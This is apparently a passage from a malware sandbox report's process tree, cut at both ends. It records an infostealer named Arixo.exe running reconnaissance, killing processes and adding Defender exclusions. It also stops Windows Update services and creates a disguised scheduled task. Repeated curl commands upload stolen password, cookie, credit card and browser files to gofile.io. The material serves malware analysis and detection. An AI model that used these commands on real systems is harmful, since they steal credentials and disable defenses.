        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0kfd4lww\0kfd4lww.cmdline"
        10⤵
        
        PID:12272
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7CD2.tmp" "c:\Users\Admin\AppData\Local\Temp\0kfd4lww\CSC5B097BD4DA8A4C2B9A7071F9CFA05D2E.TMP"
        11⤵
        
        PID:7396
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:4012
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:12136
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:12200
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:5564
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:7196
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:7508
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:7360
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:7960
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:8052
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:8304
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4364"
        8⤵
        
        PID:10500
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4364
        9⤵
        Kills process with taskkill
        
        PID:11040
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3724"
        8⤵
        
        PID:11128
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3724
        9⤵
        Kills process with taskkill
        
        PID:11448
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3712"
        8⤵
        
        PID:11376
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3712
        9⤵
        Kills process with taskkill
        
        PID:11672
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4820"
        8⤵
        
        PID:11744
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4820
        9⤵
        Kills process with taskkill
        
        PID:11984
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3628"
        8⤵
        
        PID:11956
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3628
        9⤵
        Kills process with taskkill
        
        PID:7272
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5040"
        8⤵
        
        PID:6852
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:5260
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5040
        9⤵
        Kills process with taskkill
        
        PID:7016
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1580"
        8⤵
        
        PID:5504
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1580
        9⤵
        Kills process with taskkill
        
        PID:6980
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2324"
        8⤵
        
        PID:6388
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2324
        9⤵
        Kills process with taskkill
        
        PID:6172
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4288"
        8⤵
        
        PID:3572
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4288
        9⤵
        Kills process with taskkill
        
        PID:5532
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4196"
        8⤵
        
        PID:12236
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4196
        9⤵
        Kills process with taskkill
        
        PID:3340
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        8⤵
        
        PID:1788
        
        C:\Windows\system32\getmac.exe
        
        getmac
        9⤵
        
        PID:3288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1676"
        8⤵
        
        PID:4444
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1676
        9⤵
        Kills process with taskkill
        
        PID:7712
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2108"
        8⤵
        
        PID:7492
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2108
        9⤵
        Kills process with taskkill
        
        PID:7436
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2380"
        8⤵
        
        PID:7564
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2380
        9⤵
        Kills process with taskkill
        
        PID:7588
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1976"
        8⤵
        
        PID:7504
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1976
        9⤵
        Kills process with taskkill
        
        PID:7252
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5148"
        8⤵
        
        PID:7284
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5148
        9⤵
        Kills process with taskkill
        
        PID:7880
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5164"
        8⤵
        
        PID:7952
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5164
        9⤵
        Kills process with taskkill
        
        PID:8020
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5172"
        8⤵
        
        PID:7940
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5172
        9⤵
        Kills process with taskkill
        
        PID:8136
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5200"
        8⤵
        
        PID:7032
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5200
        9⤵
        Kills process with taskkill
        
        PID:8232
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5208"
        8⤵
        
        PID:3012
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5208
        9⤵
        Kills process with taskkill
        
        PID:8324
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5228"
        8⤵
        
        PID:8364
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5228
        9⤵
        Kills process with taskkill
        
        PID:8404
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5252"
        8⤵
        
        PID:8484
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5252
        9⤵
        Kills process with taskkill
        
        PID:8540
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5292"
        8⤵
        
        PID:8644
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5292
        9⤵
        Kills process with taskkill
        
        PID:8704
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5320"
        8⤵
        
        PID:12100
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5320
        9⤵
        Kills process with taskkill
        
        PID:8744
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 6468"
        8⤵
        
        PID:3972
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 6468
        9⤵
        Kills process with taskkill
        
        PID:3640
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 6928"
        8⤵
        
        PID:8820
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 6928
        9⤵
        Kills process with taskkill
        
        PID:6044
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 7048"
        8⤵
        
        PID:2344
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 7048
        9⤵
        Kills process with taskkill
        
        PID:8900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 6076"
        8⤵
        
        PID:8944
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 6076
        9⤵
        Kills process with taskkill
        
        PID:9036
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI70082\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\Jkvoc.zip" *"
        8⤵
        
        PID:9104
        
        C:\Users\Admin\AppData\Local\Temp\_MEI70082\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI70082\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\Jkvoc.zip" *
        9⤵
        Executes dropped EXE
        
        PID:9156
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        8⤵
        
        PID:9272
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        9⤵
        
        PID:11048
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        8⤵
        
        PID:9532
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        9⤵
        
        PID:9468
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        8⤵
        
        PID:9416
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        9⤵
        
        PID:9352
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        8⤵
        
        PID:11544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:11612
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        8⤵
        
        PID:9940
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        9⤵
        Detects videocard installed
        
        PID:9872
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        8⤵
        
        PID:9840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5272
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:10800
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:5672
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:11080
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:11100
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:11116
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4184
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:11120
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:11164
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:5076
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yntnomxcupkb.xml"
  2⤵
  - Creates scheduled task(s)
  PID:11244
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:11668
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:11248
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious use of SendNotifyMessage
  PID:7000
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:7772
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7468
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:2556
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1220
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:5168
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3356
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:6224
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:5420
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:5388
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:6492
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\yntnomxcupkb.xml"
  2⤵
  - Creates scheduled task(s)
  PID:6512
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6528
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  PID:3696
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:6176
- C:\Users\Admin\Downloads\Arixo.exe
  "C:\Users\Admin\Downloads\Arixo.exe"
  2⤵
  - Executes dropped EXE
  PID:616
- - C:\Users\Admin\Downloads\Arixo.exe
    "C:\Users\Admin\Downloads\Arixo.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    PID:5224
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store9.gofile.io/uploadFile"
      4⤵
      PID:1576
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2940
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store9.gofile.io/uploadFile
        5⤵
        
        PID:7844
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store9.gofile.io/uploadFile"
      4⤵
      PID:6128
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:8276
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store9.gofile.io/uploadFile
        5⤵
        
        PID:8400
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store9.gofile.io/uploadFile"
      4⤵
      PID:9664
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:9608
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store9.gofile.io/uploadFile
        5⤵
        
        PID:9432
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store9.gofile.io/uploadFile"
      4⤵
      PID:10792
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:10060
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store9.gofile.io/uploadFile
        5⤵
        
        PID:10708
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store9.gofile.io/uploadFile"
      4⤵
      PID:7004
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5888
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store9.gofile.io/uploadFile
        5⤵
        
        PID:6244
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store9.gofile.io/uploadFile"
      4⤵
      PID:11004
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:10980
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store9.gofile.io/uploadFile
        5⤵
        
        PID:5580
- C:\Users\Admin\Downloads\Arixo.exe
  "C:\Users\Admin\Downloads\Arixo.exe"
  2⤵
  - Executes dropped EXE
  PID:916
- - C:\Users\Admin\Downloads\Arixo.exe
    "C:\Users\Admin\Downloads\Arixo.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    PID:5028
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store9.gofile.io/uploadFile"
      4⤵
      PID:6808
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6212
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store9.gofile.io/uploadFile
        5⤵
        
        PID:7676
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store9.gofile.io/uploadFile"
      4⤵
      PID:6224
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4924
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store9.gofile.io/uploadFile
        5⤵
        
        PID:5396
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store9.gofile.io/uploadFile"
      4⤵
      PID:9620
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:9300
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store9.gofile.io/uploadFile
        5⤵
        
        PID:9368
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store9.gofile.io/uploadFile"
      4⤵
      PID:2360
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3816
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store9.gofile.io/uploadFile
        5⤵
        
        PID:10876
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store9.gofile.io/uploadFile"
      4⤵
      PID:11788
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4872
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store9.gofile.io/uploadFile
        5⤵
        
        PID:6216
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store9.gofile.io/uploadFile"
      4⤵
      PID:464
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4928
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store9.gofile.io/uploadFile
        5⤵
        
        PID:752
- C:\Users\Admin\Downloads\Arixo.exe
  "C:\Users\Admin\Downloads\Arixo.exe"
  2⤵
  - Executes dropped EXE
  PID:9680
- - C:\Users\Admin\Downloads\Arixo.exe
    "C:\Users\Admin\Downloads\Arixo.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    PID:5920
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile"
      4⤵
      PID:11548
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:11588
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile
        5⤵
        
        PID:10180
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile"
      4⤵
      PID:10520
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3528
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile
        5⤵
        
        PID:4896
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile"
      4⤵
      PID:11492
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:11652
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile
        5⤵
        
        PID:11192
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile"
      4⤵
      PID:5564
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:12200
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile
        5⤵
        
        PID:5532
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile"
      4⤵
      PID:4476
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:888
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile
        5⤵
        
        PID:4044
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile"
      4⤵
      PID:7276
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5768
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile
        5⤵
        
        PID:7968
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  PID:5400
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffd4526ab58,0x7ffd4526ab68,0x7ffd4526ab78
    3⤵
    PID:6064
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1720 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:2
    3⤵
    PID:8200
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1988 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:8
    3⤵
    PID:8100
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2268 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:8
    3⤵
    PID:8176
- - C:\Program Files\Google\Chrome\Application\chrome.exe
